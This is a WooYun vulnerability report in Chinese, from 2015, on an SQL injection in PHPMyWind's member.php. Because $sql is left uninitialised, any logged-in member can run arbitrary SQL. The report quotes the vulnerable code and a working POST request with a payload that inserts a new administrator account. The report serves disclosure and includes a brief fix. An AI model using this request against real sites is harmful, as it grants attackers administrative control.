当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117008

漏洞标题:PHPMyWind一个为所欲为的注入

相关厂商:phpmywind.com

漏洞作者: 路人曱

提交时间:2015-06-01 12:59

修复时间:2015-09-04 13:00

公开时间:2015-09-04 13:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-01: 细节已通知厂商并且等待厂商处理中
2015-06-06: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-07-31: 细节向核心白帽子及相关领域专家公开
2015-08-10: 细节向普通白帽子公开
2015-08-20: 细节向实习白帽子公开
2015-09-04: 细节向公众公开

简要描述:

rt

详细说明:

PHPMyWind最新版
只需会员登录 即可进行任意sql操作
漏洞代码:
/member.php
861-941行

else if($a == 'perfect')
{
	//初始化参数
	$username   = empty($username)   ? '' : $username;
	$password   = empty($password)   ? '' : md5(md5($password));
	$repassword = empty($repassword) ? '' : md5(md5($repassword));
	$email      = empty($email)      ? '' : $email;
	//验证输入数据
	if($username == '' or
	   $password == '' or
	   $repassword == '' or
	   $email == '')
	{
		header('location:?c=perfect');
		exit();
	}
	if($password != $repassword)
	{
		header('location:?c=perfect');
		exit();
	}
    $uname_len = strlen($username);
	$upwd_len  = strlen($_POST['password']);
	if($uname_len<6 or $uname_len>16 or $upwd_len<6 or $upwd_len>16)
	{
		header('location:?c=perfect');
		exit();
	}
	if(preg_match("/[^0-9a-zA-Z_@!\.-]/",$username) or
	   preg_match("/[^0-9a-zA-Z_-]/",$password) or
	   !preg_match("/^[\w-]+(\.[\w-]+)*@[\w-]+(\.[\w-]+)+$/", $email))
	{
		header('location:?c=perfect');
		exit();
	}
	$r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `username`='$username'");
	if(isset($r['id']))
	{
		ShowMsg('用户名已存在!','-1');
		exit();
	}
	$r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `email`='$email'");
	if(isset($r['id']))
	{
		ShowMsg('您填写的邮箱已被注册!','-1');
		exit();
	}
	//添加用户数据
	$regtime  = time();
	$regip    = GetIP();
	
	if(check_app_login('qq'))
	{
		$r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `qqid`='".$_SESSION['app']['qq']['uid']."'");
		if(isset($r['id']))
			ShowMsg('该QQ已与其他账号绑定!','-1');
		else
			$sql = "INSERT INTO `#@__member` (username, password, email, expval, regtime, regip, logintime, loginip, qqid) VALUES ('$username', '$password', '$email', '10', '$regtime', '$regip', '$regtime', '$regip', '".$_SESSION['app']['qq']['uid']."')";	
	}
	else if(check_app_login('weibo'))
	{
		$r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `qqid`='".$_SESSION['app']['weibo']['idstr']."'");
		if(isset($r['id']))
			ShowMsg('该微博已与其他账号绑定!','-1');
		else
			$sql = "INSERT INTO `#@__member` (username, password, email, expval, regtime, regip, logintime, loginip, weiboid) VALUES ('$username', '$password', '$email', '10', '$regtime', '$regip', '$regtime', '$regip', '".$_SESSION['app']['weibo']['idstr']."')";	
	}
	
	$dosql->ExecNoneQuery($sql);


主要代码

if(check_app_login('qq'))
	{
		$r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `qqid`='".$_SESSION['app']['qq']['uid']."'");
		if(isset($r['id']))
			ShowMsg('该QQ已与其他账号绑定!','-1');
		else
			$sql = "INSERT INTO `#@__member` (username, password, email, expval, regtime, regip, logintime, loginip, qqid) VALUES ('$username', '$password', '$email', '10', '$regtime', '$regip', '$regtime', '$regip', '".$_SESSION['app']['qq']['uid']."')";	
	}
	else if(check_app_login('weibo'))
	{
		$r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `qqid`='".$_SESSION['app']['weibo']['idstr']."'");
		if(isset($r['id']))
			ShowMsg('该微博已与其他账号绑定!','-1');
		else
			$sql = "INSERT INTO `#@__member` (username, password, email, expval, regtime, regip, logintime, loginip, weiboid) VALUES ('$username', '$password', '$email', '10', '$regtime', '$regip', '$regtime', '$regip', '".$_SESSION['app']['weibo']['idstr']."')";	
	}
	
	$dosql->ExecNoneQuery($sql);


$sql 在if else if中才赋值
只需不进入2个条件即可
最后执行 很简单 完全操控所以语句

漏洞证明:

利用起来也很简单
注册个用户登录后发个如下的包即可
POST /phpmywind/member.php?a=perfect
DATA username=123123123x&password=123123123&repassword=123123123&[email protected]&sql=xxxxx
username email 不是注册过的就行 随便乱填

11.jpg


22.jpg


sql改成 insert into pmw_admin (`username`,`password`) values ((123456),md5(123456))
即可创建一个 123456 密码123456的管理员账户

修复方案:

初始化

版权声明:转载请注明来源 路人曱@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-04 13:00

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无